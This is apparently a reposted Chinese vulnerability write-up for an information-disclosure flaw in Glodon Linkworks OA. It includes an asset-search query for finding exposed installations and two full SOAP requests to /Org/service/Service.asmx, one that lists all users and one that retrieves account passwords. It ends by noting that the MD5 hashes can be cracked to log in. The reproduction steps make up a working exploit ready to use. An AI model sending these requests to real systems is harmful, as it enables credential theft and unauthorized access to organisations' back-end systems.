登录 白背景

广联达OA Service.asmx 信息泄露漏洞

一、漏洞简介

广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达 Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账户密码登录后台,从而造成不良影响。

二、影响版本

  • 广联达办公OA

三、资产测绘

  • app.name="广联达 OA"
  • 登录页面

image.png

四、漏洞复现

隐患url

/Org/service/Service.asmx

image.png
查看所有用户

POST /Org/service/Service.asmx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetAllUsersXml xmlns="http://tempuri.org/" />
  </soap12:Body>
</soap12:Envelope>

image.png
查询账户密码

POST /Org/service/Service.asmx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetUserXml4GEPS xmlns="http://tempuri.org/" />
  </soap12:Body>
</soap12:Envelope>

image.png
MD5解密即可登陆系统
1698591172291-5a8ff27a-93d4-405a-bd79-a76210237555.png

原文: https://www.yuque.com/xiaokp7/ocvun2/uw4ierxrai4babeu